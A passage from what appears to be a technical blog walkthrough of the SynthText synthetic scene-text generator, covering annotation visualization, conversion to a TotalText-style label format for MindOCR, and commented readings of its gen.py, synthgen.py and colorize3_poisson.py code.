    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin: ' + data['imnames'][0][index][0])

axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('bbox')

axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
axes[2].axis('off')
axes[2].set_title('cbox')

plt.tight_layout()
plt.show()

(figure: the original image with word-level (bbox) and character-level (cbox) annotations)

Converting to a MindOCR-readable TotalText format

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np
import shutil
from tqdm import tqdm

file_dir = r'D:/dataset/SynthText/SynthText/'
save_image_dir = r'D:/dataset/SynthText/SynthText/images'
save_label_dir = r'D:/dataset/SynthText/SynthText/Txts'

for index in tqdm(range(858750)):
    image_path = os.path.join(file_dir, data['imnames'][0][index][0])
    shutil.copy(image_path, os.path.join(save_image_dir, 'img' + str(index) + '.jpg'))

    string = ""
    txt = []
    for element in list(data['txt'][0][index]):
        txt.extend(element.split())

    if isinstance(data['wordBB'][0][index][0][0], np.ndarray):
        for i in range(len(data['wordBB'][0][index][0][0])):  # bbox
            x = [int(num) for num in data['wordBB'][0][index][0][:, i]]
            y = [int(num) for num in data['wordBB'][0][index][1][:, i]]
            transcriptions = txt[i]

            string += 'x: [[' + ' '.join(map(str, x))
            string += ']], y: [[' + ' '.join(map(str, y))
            string += "]], ornt: [u'h'], transcriptions: [u'" + transcriptions + "']\n"
    else:
        x = [int(num) for num in data['wordBB'][0][index][0]]
        y = [int(num) for num in data['wordBB'][0][index][1]]
        transcriptions = txt[0]

        string += 'x: [[' + ' '.join(map(str, x))
        string += ']], y: [[' + ' '.join(map(str, y))
        string += "]], ornt: [u'h'], transcriptions: [u'" + transcriptions + "']\n"

    with open(os.path.join(save_label_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
        file.write(string)

Code

​ Get the code from ankush-me/SynthText at python3 (github.com) and run it under WSL2; set up the environment by solving problems as they come up, and it will run eventually.

​ Generate images:

    python gen.py --viz

​ Visualize the results:

    python visualize_results.py

(figure: a visualized synthetic sample)

    image name        :  hiking_125.jpg_0
    ** no. of chars : 69
    ** no. of words : 15
    ** text : ['>>Potvin' 'someone\n wrong \ngetting' 'cloud' 'do with' 'Calgary\nfinal'
    'Re:' 'I have' 'a stud\nMorgan']

Reading the code (there is a lot of it; let's pick out a few parts)

    gen.py

import numpy as np
import h5py  # for reading/writing data in the HDF5 file format
import os, sys, traceback  # file/system operations and exception handling
import os.path as osp  # path handling
from synthgen import *  # the synthgen module holds the functions and classes for generating synthetic text images
from common import *  # the common module holds some shared functions and constants
import wget, tarfile  # for downloading and unpacking files


# Define some configuration variables:
NUM_IMG = -1  # no. of images to use for generation (-1 to use all available)
INSTANCE_PER_IMAGE = 1  # no. of times to use the same image
SECS_PER_IMG = 5  # max time per image in seconds

# path to the data-file, containing image, depth and segmentation:
DATA_PATH = 'data'
DB_FNAME = osp.join(DATA_PATH, 'dset.h5')  # full path to the database file
# url of the data (google-drive public file):
DATA_URL = 'http://www.robots.ox.ac.uk/~ankush/data.tar.gz'
OUT_FILE = 'results/SynthText.h5'  # output file path

def get_data():
    """
    Download the image, depth and segmentation data:
    Returns the h5 database.
    """
    # if the h5 file does not exist yet, download and unpack the data
    if not osp.exists(DB_FNAME):
        try:
            # print the download URL and file size
            colorprint(Color.BLUE, '\tdownloading data (56 M) from: ' + DATA_URL, bold=True)
            print()
            sys.stdout.flush()
            # download the data with wget.download() into "data.tar.gz"
            out_fname = 'data.tar.gz'
            wget.download(DATA_URL, out=out_fname)
            # open the tar file and extract its contents
            tar = tarfile.open(out_fname)
            tar.extractall()
            # close the tar file and delete "data.tar.gz"
            tar.close()
            os.remove(out_fname)
            # print where the data was saved
            colorprint(Color.BLUE, '\n\tdata saved at:' + DB_FNAME, bold=True)
            sys.stdout.flush()
        except:  # the download failed: report the error and exit
            print(colorize(Color.RED, 'Data not found and have problems downloading.', bold=True))
            sys.stdout.flush()
            sys.exit(-1)
    # open the h5 file read-only and return the database object
    return h5py.File(DB_FNAME, 'r')


def add_res_to_db(imgname, res, db):
    """
    Add the synthetically generated text image instance
    and other metadata to the dataset.
    :param imgname: image name
    :param res: the generated synthetic text image instances
    :param db: database object
    """
    ninstance = len(res)  # number of generated instances
    for i in range(ninstance):  # for each instance
        # create a dataset named after the image and instance index, storing the synthesized image
        dname = "%s_%d" % (imgname, i)
        db['data'].create_dataset(dname, data=res[i]['img'])
        # attach the character (charBB) and word (wordBB) bounding boxes as attributes
        db['data'][dname].attrs['charBB'] = res[i]['charBB']
        db['data'][dname].attrs['wordBB'] = res[i]['wordBB']
        # db['data'][dname].attrs['txt'] = res[i]['txt']
        L = res[i]['txt']
        L = [n.encode("ascii", "ignore") for n in L]
        db['data'][dname].attrs['txt'] = L


def main(viz=False):
    # open databases:
    print(colorize(Color.BLUE, 'getting data..', bold=True))
    db = get_data()
    print(colorize(Color.BLUE, '\t-> done', bold=True))

    # open the output h5 file:
    out_db = h5py.File(OUT_FILE, 'w')
    out_db.create_group('/data')
    print(colorize(Color.GREEN, 'Storing the output in: ' + OUT_FILE, bold=True))

    # get the names of the image files in the dataset:
    imnames = sorted(db['image'].keys())
    N = len(imnames)
    global NUM_IMG
    if NUM_IMG < 0:  # -1 means: use all available images
        NUM_IMG = N
    start_idx, end_idx = 0, min(NUM_IMG, N)  # set the start and end indices

    RV3 = RendererV3(DATA_PATH, max_time=SECS_PER_IMG)
    for i in range(start_idx, end_idx):  # loop over each image
        imname = imnames[i]
        try:
            # get the image:
            img = Image.fromarray(db['image'][imname][:])
            # get the pre-computed depth:
            # there are 2 estimates of depth (represented as 2 "channels")
            # here we are using the second one (in some cases it might be
            # useful to use the other one):
            depth = db['depth'][imname][:].T
            depth = depth[:, :, 1]
            # get segmentation:
            seg = db['seg'][imname][:].astype('float32')
            area = db['seg'][imname].attrs['area']
            label = db['seg'][imname].attrs['label']

            # re-size uniformly:
            sz = depth.shape[:2][::-1]
            img = np.array(img.resize(sz, Image.ANTIALIAS))
            seg = np.array(Image.fromarray(seg).resize(sz, Image.NEAREST))

            print(colorize(Color.RED, '%d of %d' % (i, end_idx - 1), bold=True))
            # render text into the image with RendererV3, then add the synthesized
            # image and its metadata to the output database
            res = RV3.render_text(img, depth, seg, area, label,
                                  ninstance=INSTANCE_PER_IMAGE, viz=viz)
            if len(res) > 0:
                # non-empty : successful in placing text:
                add_res_to_db(imname, res, out_db)
            # visualize the output:
            if viz:
                if 'q' in input(colorize(Color.RED, 'continue? (enter to continue, q to exit): ', True)):
                    break
        except:
            traceback.print_exc()
            print(colorize(Color.GREEN, '>>>> CONTINUING....', bold=True))
            continue
    db.close()
    out_db.close()


if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser(description='Generate Synthetic Scene-Text Images')
    parser.add_argument('--viz', action='store_true', dest='viz', default=False, help='flag for turning on visualizations')
    args = parser.parse_args()
    main(args.viz)

    synthgen.py

    Main script for synthetic text rendering.

    from __future__ import division
    import copy
    import cv2
    import h5py
    from PIL import Image
    import numpy as np
    #import mayavi.mlab as mym
    import matplotlib.pyplot as plt
    import os.path as osp
    import scipy.ndimage as sim
    import scipy.spatial.distance as ssd
    import synth_utils as su
    import text_utils as tu
    from colorize3_poisson import Colorize
    from common import *
    import traceback, itertools

    class TextRegions()

class TextRegions(object):
    """
    Get regions from the segmentation which are good for placing text.
    """
    # a region is a viable text region only if it is at least minWidth wide and minHeight tall
    minWidth = 30  # px
    minHeight = 30  # px
    # ...and only if its width-to-height ratio lies between minAspect and maxAspect
    minAspect = 0.3  # w > 0.3*h
    maxAspect = 7
    # ...and only if it covers at least minArea pixels
    minArea = 100  # number of pix
    # ...and only if it fills at least pArea of its minimum-area bounding rectangle
    pArea = 0.60  # area_obj/area_minrect >= 0.6

    # RANSAC planar fitting params:
    # distance threshold: a point is an inlier if its distance to the fitted plane is below dist_thresh
    dist_thresh = 0.10  # m
    # minimum inlier count: the fit fails if the fitted plane has fewer inliers
    num_inlier = 90
    # number of RANSAC trials; each trial fits a plane to a random subset of points
    ransac_fit_trials = 100
    # minimum z component of the plane normal: planes below this are nearly parallel to the
    # viewing direction and cannot be used as text regions
    min_z_projection = 0.25
    # minimum width of a rectified text region: only regions wider than minW are kept
    minW = 20

    @staticmethod
    def filter_rectified(mask):
        """
        Filter rectified text regions: keep one only if both its width and
        height are at least TextRegions.minW.
        mask : 1 where "ON", 0 where "OFF"
        """
        # project the region onto the vertical and horizontal axes and take the medians
        wx = np.median(np.sum(mask, axis=0))
        wy = np.median(np.sum(mask, axis=1))
        # keep the region if both medians are at least TextRegions.minW
        return wx > TextRegions.minW and wy > TextRegions.minW

    @staticmethod
    def get_hw(pt, return_rot=False):
        # compute the width and height of a text region after rotation rectification
        pt = pt.copy()
        # unrotate2d estimates the region's principal-axis angle and returns the rotation
        # that brings it back to horizontal
        R = su.unrotate2d(pt)
        # median of the coordinates, used to move the region's center to the origin
        mu = np.median(pt, axis=0)
        # apply the rotation matrix R, then move the center back
        pt = (pt - mu[None, :]).dot(R.T) + mu[None, :]
        # width/height of the rectified region = max minus min of the coordinates
        h, w = np.max(pt, axis=0) - np.min(pt, axis=0)
        if return_rot:
            # optionally also return the rotation matrix R
            return h, w, R
        return h, w

    @staticmethod
    def filter(seg, area, label):
        """
        Apply the filter.
        The final list is ranked by area.
        :seg: segmentation image
        :area: region areas
        :label: region labels
        """
        # drop regions below the minimum-area threshold and update good/area
        good = label[area > TextRegions.minArea]
        area = area[area > TextRegions.minArea]
        filt, R = [], []
        for idx, i in enumerate(good):
            # binary mask of the region with label i
            mask = seg == i
            # coordinates of the mask's non-zero pixels
            xs, ys = np.where(mask)
            # stacked into a float32 coordinate array
            coords = np.c_[xs, ys].astype('float32')
            # minimum-area bounding rectangle of the region
            rect = cv2.minAreaRect(coords)
            # box = np.array(cv2.cv.BoxPoints(rect))
            # the rectangle's four corner points
            box = np.array(cv2.boxPoints(rect))
            # rectified height h, width w and rotation matrix rot of the region
            h, w, rot = TextRegions.get_hw(box, return_rot=True)
            # keep the region only if all of the following hold:
            # h > minHeight and w > minWidth: the region is tall/wide enough;
            # minAspect < w/h < maxAspect: its aspect ratio is within bounds;
            # the region fills enough of its minimum rectangle (note: as written,
            # area[idx]/w*h evaluates to area*h/w; the pArea definition suggests
            # area/(w*h) was the intent)
            f = (h > TextRegions.minHeight
                 and w > TextRegions.minWidth
                 and TextRegions.minAspect < w / h < TextRegions.maxAspect
                 and area[idx] / w * h > TextRegions.pArea)
            filt.append(f)
            R.append(rot)

        # filter bad regions:
        filt = np.array(filt)
        area = area[filt]
        R = [R[i] for i in range(len(R)) if filt[i]]

        # sort the regions based on areas:
        aidx = np.argsort(-area)
        good = good[filt][aidx]
        R = [R[i] for i in aidx]
        # return a dict with the labels, rotation matrices and areas of the surviving regions
        filter_info = {'label': good, 'rot': R, 'area': area[aidx]}
        return filter_info
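    # For intuition, cv2.minAreaRect / cv2.boxPoints (used above) on a toy point set
    # (illustrative values, not taken from the dataset):
    #   pts = np.array([[0, 0], [10, 2], [9, 7], [-1, 5]], np.float32)
    #   rect = cv2.minAreaRect(pts)   # ((cx, cy), (w, h), angle)
    #   box = cv2.boxPoints(rect)     # the 4 corners of the rotated rectangle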

    @staticmethod
    def sample_grid_neighbours(mask, nsample, step=3):
        """
        Given a HxW binary mask, sample 4 neighbours on the grid,
        in the cardinal directions, STEP pixels away.
        :mask: H x W binary mask
        :nsample: number of samples
        :step: sampling step
        """
        if 2 * step >= min(mask.shape[:2]):
            return  # None
        # coordinates of the mask's non-zero pixels
        y_m, x_m = np.where(mask)
        # mask_idx stores, at each non-zero pixel, that pixel's index
        mask_idx = np.zeros_like(mask, 'int32')
        for i in range(len(y_m)):
            mask_idx[y_m[i], x_m[i]] = i
        # shift the mask by `step` pixels in the +x, -x, +y and -y directions
        xp, xn = np.zeros_like(mask), np.zeros_like(mask)
        yp, yn = np.zeros_like(mask), np.zeros_like(mask)
        xp[:, :-2 * step] = mask[:, 2 * step:]
        xn[:, 2 * step:] = mask[:, :-2 * step]
        yp[:-2 * step, :] = mask[2 * step:, :]
        yn[2 * step:, :] = mask[:-2 * step, :]
        # a pixel is valid only if the mask is on there and in all four directions
        valid = mask & xp & xn & yp & yn

        # coordinates of the valid pixels
        ys, xs = np.where(valid)
        # if there are no valid pixels, return None
        N = len(ys)
        if N == 0:  # no valid pixels in mask:
            return  # None
        # sample nsample pixels (at most N)
        nsample = min(nsample, N)
        # pick nsample distinct indices at random
        idx = np.random.choice(N, nsample, replace=False)
        # generate neighborhood matrix:
        # (1+4)x2xNsample (2 for y,x)
        xs, ys = xs[idx], ys[idx]
        s = step
        X = np.transpose(np.c_[xs, xs + s, xs + s, xs - s, xs - s][:, :, None], (1, 2, 0))
        Y = np.transpose(np.c_[ys, ys + s, ys - s, ys + s, ys - s][:, :, None], (1, 2, 0))
        sample_idx = np.concatenate([Y, X], axis=1)
        # convert the neighbourhood matrix into a 5 x Nsample matrix of pixel indices
        mask_nn_idx = np.zeros((5, sample_idx.shape[-1]), 'int32')
        # for each sampled neighbourhood, look the pixel indices up in mask_idx
        for i in range(sample_idx.shape[-1]):
            mask_nn_idx[:, i] = mask_idx[sample_idx[:, :, i][:, 0], sample_idx[:, :, i][:, 1]]
        return mask_nn_idx

    @staticmethod
    def filter_depth(xyz, seg, regions):
        """
        Depth-filter each region, given the point cloud, the segmentation
        and the region info.
        :xyz: point-cloud coordinates
        :seg: segmentation result
        :regions: region info
        """
        # plane_info collects the planes that pass the checks
        plane_info = {'label': [],
                      'coeff': [],
                      'support': [],
                      'rot': [],
                      'area': []}
        for idx, l in enumerate(regions['label']):
            # binary mask of the region with label l
            mask = seg == l
            # sample point neighbourhoods used for RANSAC plane fitting
            pt_sample = TextRegions.sample_grid_neighbours(mask, TextRegions.ransac_fit_trials, step=3)
            # skip the region if there are not enough points for RANSAC
            if pt_sample is None:
                continue  # not enough points for RANSAC
            # get-depths
            # point coordinates belonging to the current region
            pt = xyz[mask]
            # run the planarity check: su.isplanar takes the points, the sampled neighbourhoods
            # and some thresholds; if a plane is detected, plane_model holds its coefficients
            # and support indices
            plane_model = su.isplanar(pt, pt_sample,
                                      TextRegions.dist_thresh,
                                      TextRegions.num_inlier,
                                      TextRegions.min_z_projection)
            # if a plane was found and it faces the camera enough, record its info
            if plane_model is not None:
                plane_coeff = plane_model[0]
                if np.abs(plane_coeff[2]) > TextRegions.min_z_projection:
                    plane_info['label'].append(l)
                    plane_info['coeff'].append(plane_model[0])
                    plane_info['support'].append(plane_model[1])
                    plane_info['rot'].append(regions['rot'][idx])
                    plane_info['area'].append(regions['area'][idx])

        return plane_info

    @staticmethod
    def get_regions(xyz, seg, area, label):
        """
        Get the text regions, given the point cloud, the segmentation,
        the region areas and the region labels.
        :xyz: point-cloud coordinates
        :seg: segmentation result
        :area: region areas
        :label: region labels
        """
        # first filter the segmentation to get candidate text regions
        regions = TextRegions.filter(seg, area, label)
        # fit plane to text-regions:
        # then depth-filter each region, keeping only those with a usable planar fit
        regions = TextRegions.filter_depth(xyz, seg, regions)
        return regions

    colorize3_poisson.py

    import cv2 as cv
    import numpy as np
    import matplotlib.pyplot as plt
    import scipy.interpolate as si
    import scipy.ndimage as scim
    import scipy.ndimage.interpolation as sii
    import os
    import os.path as osp
    #import cPickle as cp
    import _pickle as cp
    #import Image
    from PIL import Image
    from poisson_reconstruct import blit_images
    import pickle

    sample_weighted()

def sample_weighted(p_dict):
    """
    Takes a dict p_dict representing a probability distribution (key -> probability)
    and returns one key sampled according to those probabilities via np.random.choice.
    (list() is needed here: under Python 3, dict views are not indexable.)
    """
    ps = list(p_dict.keys())
    return ps[np.random.choice(len(ps), p=list(p_dict.values()))]
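​ For instance, with hypothetical weights:

use_shadow = sample_weighted({True: 0.15, False: 0.85})  # True about 15% of the time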

    class Layer()

class Layer(object):

    def __init__(self, alpha, color):

        # alpha for the whole image:
        # alpha must be a 2D matrix; record its shape as [n, m]
        assert alpha.ndim == 2
        self.alpha = alpha
        [n, m] = alpha.shape[:2]
        # convert color to a uint8 array
        color = np.atleast_1d(np.array(color)).astype('uint8')
        # color for the image:
        # build the color matrix according to the shape of `color`:
        # a 1D color means the whole layer has one constant color
        if color.ndim == 1:  # constant color for whole layer
            ncol = color.size
            if ncol == 1:  # grayscale layer
                self.color = color * np.ones((n, m, 3), 'uint8')
            if ncol == 3:
                self.color = np.ones((n, m, 3), 'uint8') * color[None, None, :]
        # a 2D color is a grayscale image; repeat it into three channels
        elif color.ndim == 2:  # grayscale image
            self.color = np.repeat(color[:, :, None], repeats=3, axis=2).copy().astype('uint8')
        # a 3D color is an RGB image; store it directly
        elif color.ndim == 3:  # rgb image
            self.color = color.copy().astype('uint8')
        # anything else is an error
        else:
            print(color.shape)
            raise Exception("color datatype not understood")

    class FontColor()

class FontColor(object):

    def __init__(self, col_file):
        """
        Constructor: create a FontColor object and initialize its attributes.
        """
        # open col_file in binary mode and unpickle it with 'latin1' encoding
        # (the file was pickled under Python 2)
        with open(col_file, 'rb') as f:
            # self.colorsRGB = cp.load(f)
            # an _Unpickler object deserializes the data read from the file
            u = pickle._Unpickler(f)
            u.encoding = 'latin1'
            # load the data from the file
            p = u.load()
            # store the loaded color data
            self.colorsRGB = p
        # number of rows of color data
        self.ncol = self.colorsRGB.shape[0]

        # convert color-means from RGB to LAB for better nearest neighbour
        # computations:
        self.colorsLAB = np.r_[self.colorsRGB[:, 0:3], self.colorsRGB[:, 6:9]].astype('uint8')
        # cvtColor converts the RGB color data to LAB; squeeze drops the extra dimension
        self.colorsLAB = np.squeeze(cv.cvtColor(self.colorsLAB[None, :, :], cv.COLOR_RGB2Lab))


    def sample_normal(self, col_mean, col_std):
        """
        sample from a normal distribution centered around COL_MEAN
        with standard deviation = COL_STD.
        """
        # draw from N(col_mean, col_std)
        col_sample = col_mean + col_std * np.random.randn()
        # clip to [0, 255] and cast to uint8
        return np.clip(col_sample, 0, 255).astype('uint8')

    def sample_from_data(self, bg_mat):
        """
        bg_mat : this is a nxmx3 RGB image.

        returns a tuple : (RGB_foreground, RGB_background)
        each of these is a 3-vector.
        """
        # keep a copy of the background image
        bg_orig = bg_mat.copy()
        # convert the RGB image to the LAB color space
        bg_mat = cv.cvtColor(bg_mat, cv.COLOR_RGB2Lab)
        # reshape into one row per pixel
        bg_mat = np.reshape(bg_mat, (np.prod(bg_mat.shape[:2]), 3))
        # mean color of the background
        bg_mean = np.mean(bg_mat, axis=0)

        # Euclidean distance of every color entry to the background mean
        norms = np.linalg.norm(self.colorsLAB - bg_mean[None, :], axis=1)
        # choose a random color amongst the top 3 closest matches:
        # nn = np.random.choice(np.argsort(norms)[:3])
        # index of the color entry closest to the background color
        nn = np.argmin(norms)

        # nearest neighbour color:
        data_col = self.colorsRGB[np.mod(nn, self.ncol), :]

        # sample one color from the first half of the entry (mean/std)...
        col1 = self.sample_normal(data_col[:3], data_col[3:6])
        # ...and one from the second half
        col2 = self.sample_normal(data_col[6:9], data_col[9:12])

        # did the nearest neighbour come from the first or the second half?
        if nn < self.ncol:
            return (col2, col1)
        else:
            # need to swap to make the second color close to the input background color
            return (col1, col2)

    def mean_color(self, arr):
        """
        Convert the input image to HSV, average over all its pixels, and
        return the mean color converted back to RGB.
        """
        # convert the RGB image to the HSV color space
        col = cv.cvtColor(arr, cv.COLOR_RGB2HSV)
        # reshape into one row per pixel
        col = np.reshape(col, (np.prod(col.shape[:2]), 3))
        # mean color, cast to uint8
        col = np.mean(col, axis=0).astype('uint8')
        # convert back to RGB and squeeze to a 3-vector
        return np.squeeze(cv.cvtColor(col[None, None, :], cv.COLOR_HSV2RGB))

    def invert(self, rgb):
        """
        Invert a color by shifting each channel by 127 (uint8 arithmetic wraps around).
        """
        rgb = 127 + rgb
        return rgb

    def complement(self, rgb_color):
        """
        return a color which is complementary to the RGB_COLOR.
        """
        # convert to HSV and squeeze to a 3-vector
        col_hsv = np.squeeze(cv.cvtColor(rgb_color[None, None, :], cv.COLOR_RGB2HSV))
        # shift the hue by 128; uint8 arithmetic wraps modulo 256
        # (note: OpenCV stores 8-bit hue in [0, 179], so this relies on the wrap-around)
        col_hsv[0] = col_hsv[0] + 128  # uint8 mods to 255
        # convert back to RGB
        col_comp = np.squeeze(cv.cvtColor(col_hsv[None, None, :], cv.COLOR_HSV2RGB))
        return col_comp

    def triangle_color(self, col1, col2):
        """
        Returns a color which is "opposite" to both col1 and col2.
        """
        # convert both inputs to numpy arrays
        col1, col2 = np.array(col1), np.array(col2)
        # convert col1 and col2 from RGB to HSV (squeezed to 3-vectors)
        col1 = np.squeeze(cv.cvtColor(col1[None, None, :], cv.COLOR_RGB2HSV))
        col2 = np.squeeze(cv.cvtColor(col2[None, None, :], cv.COLOR_RGB2HSV))
        # hue values of col1 and col2
        h1, h2 = col1[0], col2[0]
        # make sure h1 <= h2
        if h2 < h1: h1, h2 = h2, h1  # swap
        # hue difference
        dh = h2 - h1
        # if the difference is small, take the reflex angle instead
        if dh < 127: dh = 255 - dh
        # place the new hue halfway between the two
        col1[0] = h1 + dh / 2
        # convert back to RGB and return
        return np.squeeze(cv.cvtColor(col1[None, None, :], cv.COLOR_HSV2RGB))

    def change_value(self, col_rgb, v_std=50):
        """
        Randomly change the value (brightness) of the given RGB color col_rgb;
        v_std is an optional standard deviation.
        """
        # convert to HSV (squeezed to a 3-vector)
        col = np.squeeze(cv.cvtColor(col_rgb[None, None, :], cv.COLOR_RGB2HSV))
        # current value channel
        x = col[2]
        # candidate values uniformly spread over [0, 1]
        vs = np.linspace(0, 1)
        # weight each candidate by its distance from the current value x/255.0...
        ps = np.abs(vs - x / 255.0)
        # ...normalized to sum to 1, so far-away values are more likely
        ps /= np.sum(ps)
        # sample a candidate, add a small Gaussian jitter (std 0.1), clip to [0, 1]
        v_rand = np.clip(np.random.choice(vs, p=ps) + 0.1 * np.random.randn(), 0, 1)
        # set the new value channel and convert back to RGB
        col[2] = 255 * v_rand
        return np.squeeze(cv.cvtColor(col[None, None, :], cv.COLOR_HSV2RGB))

    class Colorize()

class Colorize(object):

    def __init__(self, model_dir='data'):  # , im_path):
        # # get a list of background-images:
        # imlist = [osp.join(im_path,f) for f in os.listdir(im_path)]
        # self.bg_list = [p for p in imlist if osp.isfile(p)]

        # create a FontColor object from the color file at model_dir/models/colors_new.cp
        self.font_color = FontColor(col_file=osp.join(model_dir, 'models/colors_new.cp'))

        # probabilities of different text-effects:
        self.p_bevel = 0.05  # add bevel effect to text
        self.p_outline = 0.05  # just keep the outline of the text
        self.p_drop_shadow = 0.15  # add a drop shadow
        self.p_border = 0.15  # add a border
        self.p_displacement = 0.30  # add background-based bump-mapping
        self.p_texture = 0.0  # use an image for coloring text


    def drop_shadow(self, alpha, theta, shift, size, op=0.80):
        """
        Add a drop shadow to the input alpha layer; the effect is controlled
        by alpha, theta, shift, size and op.
        alpha : alpha layer whose shadow need to be cast
        theta : [0,2pi] -- the shadow direction
        shift : shift in pixels of the shadow
        size : size of the GaussianBlur filter
        op : opacity of the shadow (multiplying factor)

        @return : alpha of the shadow layer
        (it is assumed that the color is black/white)
        """
        if size % 2 == 0:  # the Gaussian kernel size must be odd
            size -= 1
        size = max(1, size)
        # blur the alpha layer with a (size, size) Gaussian kernel (sigma derived from size)
        shadow = cv.GaussianBlur(alpha, (size, size), 0)
        # x/y offsets of the shadow, from the direction theta and the shift distance
        [dx, dy] = shift * np.array([-np.sin(theta), np.cos(theta)])
        # shift the shadow with scipy's shift (constant 0 padding) and scale it by the opacity op
        shadow = op * sii.shift(shadow, shift=[dx, dy], mode='constant', cval=0)
        return shadow.astype('uint8')
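    # A hypothetical call (parameter values made up for illustration):
    #   shadow = colorize.drop_shadow(text_alpha, theta=np.pi / 4, shift=5, size=15, op=0.80)
    # which blurs the text mask, shifts it 5 px along theta, and scales it to 80% opacity.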

    def border(self, alpha, size, kernel_type='RECT'):
        """
        alpha : alpha layer of the text
        size : size of the kernel
        kernel_type : one of [rect,ellipse,cross]

        @return : alpha layer of the border (color to be added externally).
        """
        # map kernel_type to the corresponding morphological kernel shape
        kdict = {'RECT': cv.MORPH_RECT, 'ELLIPSE': cv.MORPH_ELLIPSE,
                 'CROSS': cv.MORPH_CROSS}
        # build a (size, size) structuring element of the requested shape
        kernel = cv.getStructuringElement(kdict[kernel_type], (size, size))
        # dilate the text alpha once so the border stands out;
        # subtracting alpha (commented out) would leave only the border ring
        border = cv.dilate(alpha, kernel, iterations=1)  # - alpha
        return border

    def blend(self, cf, cb, mode='normal'):
        """
        Only returns the foreground image: the specific blending modes are
        left unimplemented here (either unfinished or intentionally a no-op).
        """
        return cf

    def merge_two(self, fore, back, blend_type=None):
        """
        merge two FOREground and BACKground layers.
        ref: https://en.wikipedia.org/wiki/Alpha_compositing
        ref: Chapter 7 (pg. 440 and pg. 444):
        http://partners.adobe.com/public/developer/en/pdf/PDFReference.pdf
        """
        # foreground opacity in [0, 1]
        a_f = fore.alpha / 255.0
        # background opacity in [0, 1]
        a_b = back.alpha / 255.0
        # foreground and background color channels
        c_f = fore.color
        c_b = back.color
        # resulting alpha of the composite
        a_r = a_f + a_b - a_f * a_b
        if blend_type != None:
            # blend the foreground and background colors with blend()
            c_blend = self.blend(c_f, c_b, blend_type)
            # composite color built from the blended color and the two opacities
            c_r = (((1 - a_f) * a_b)[:, :, None] * c_b
                   + ((1 - a_b) * a_f)[:, :, None] * c_f
                   + (a_f * a_b)[:, :, None] * c_blend)
        else:
            # plain alpha compositing of the two colors and their opacities
            c_r = (((1 - a_f) * a_b)[:, :, None] * c_b
                   + a_f[:, :, None] * c_f)
        # return a new Layer holding the composite alpha and color channels
        return Layer((255 * a_r).astype('uint8'), c_r.astype('uint8'))
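    # Note: a_r = a_f + a_b - a_f*a_b is the standard "over" operator on opacities;
    # e.g., stacking two 50%-opaque layers gives a_r = 0.5 + 0.5 - 0.25 = 0.75.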

    def merge_down(self, layers, blends=None):
        """
        Merge several layers down into a single layer.
        layers : [l1,l2,...ln] : a list of LAYER objects.
        l1 is on the top, ln is the bottom-most layer.
        blend : the type of blend to use. Should be n-1.
        use None for plain alpha blending.
        Note : (1) it assumes that all the layers are of the SAME SIZE.
        @return : a single LAYER type object representing the merged-down image
        """
        nlayers = len(layers)  # number of layers
        if nlayers > 1:  # more than one layer to merge
            [n, m] = layers[0].alpha.shape[:2]  # size of the first layer
            out_layer = layers[-1]  # start from the bottom-most layer
            # walk from the second-to-last layer up to the top layer
            for i in range(-2, -nlayers - 1, -1):
                blend = None
                if blends is not None:
                    blend = blends[i + 1]
                out_layer = self.merge_two(fore=layers[i], back=out_layer, blend_type=blend)
            return out_layer
        else:
            return layers[0]
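    # Hypothetical use: collapse a text layer onto a background layer
    #   merged = colorize.merge_down([l_text, l_bg])   # l_text sits on top of l_bg
    #   out = merged.color                             # the composited RGB image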

    def resize_im(self, im, osize):
        # resize the input image to the given size (bicubic interpolation)
        return np.array(Image.fromarray(im).resize(osize[::-1], Image.BICUBIC))

    def occlude(self):
        """
        somehow add occlusion to text.
        This is a placeholder: the body is just `pass`, so no occlusion is
        actually applied in the current implementation.
        """
        pass

    def color_border(self, col_text, col_bg):
        """
        Decide on a color for the border:
        - could be the same as text-color but lower/higher 'VALUE' component.
        - could be the same as bg-color but lower/higher 'VALUE'.
        - could be 'mid-way' color b/w text & bg colors.
        """
        # pick one of the three strategies at random
        choice = np.random.choice(3)
        # convert the text color to HSV to manipulate its components
        col_text = cv.cvtColor(col_text, cv.COLOR_RGB2HSV)
        # flatten to one row per pixel and take the mean color
        col_text = np.reshape(col_text, (np.prod(col_text.shape[:2]), 3))
        col_text = np.mean(col_text, axis=0).astype('uint8')
        # candidate values uniformly spread over [0, 1], used for random sampling
        vs = np.linspace(0, 1)

        def get_sample(x):
            """
            Sample a value weighted by its distance from x/255.0, add a small
            random jitter, and return the result scaled back to [0, 255].
            """
            ps = np.abs(vs - x / 255.0)
            ps /= np.sum(ps)
            v_rand = np.clip(np.random.choice(vs, p=ps) + 0.1 * np.random.randn(), 0, 1)
            return 255 * v_rand

        # first choose a color, then inc/dec its VALUE:
        if choice == 0:
            # increase/decrease saturation:
            col_text[0] = get_sample(col_text[0])  # saturation
            col_text = np.squeeze(cv.cvtColor(col_text[None, None, :], cv.COLOR_HSV2RGB))
        elif choice == 1:
            # get the complementary color to text:
            col_text = np.squeeze(cv.cvtColor(col_text[None, None, :], cv.COLOR_HSV2RGB))
            col_text = self.font_color.complement(col_text)
        else:
            # choose a mid-way color between the text and background colors:
            col_bg = cv.cvtColor(col_bg, cv.COLOR_RGB2HSV)
            col_bg = np.reshape(col_bg, (np.prod(col_bg.shape[:2]), 3))
            col_bg = np.mean(col_bg, axis=0).astype('uint8')
            col_bg = np.squeeze(cv.cvtColor(col_bg[None, None, :], cv.COLOR_HSV2RGB))
            col_text = np.squeeze(cv.cvtColor(col_text[None, None, :], cv.COLOR_HSV2RGB))
            col_text = self.font_color.triangle_color(col_text, col_bg)

        # now change the VALUE channel:
        col_text = np.squeeze(cv.cvtColor(col_text[None, None, :], cv.COLOR_RGB2HSV))
        col_text[2] = get_sample(col_text[2])  # value
        # convert back to RGB and return
        return np.squeeze(cv.cvtColor(col_text[None, None, :], cv.COLOR_HSV2RGB))

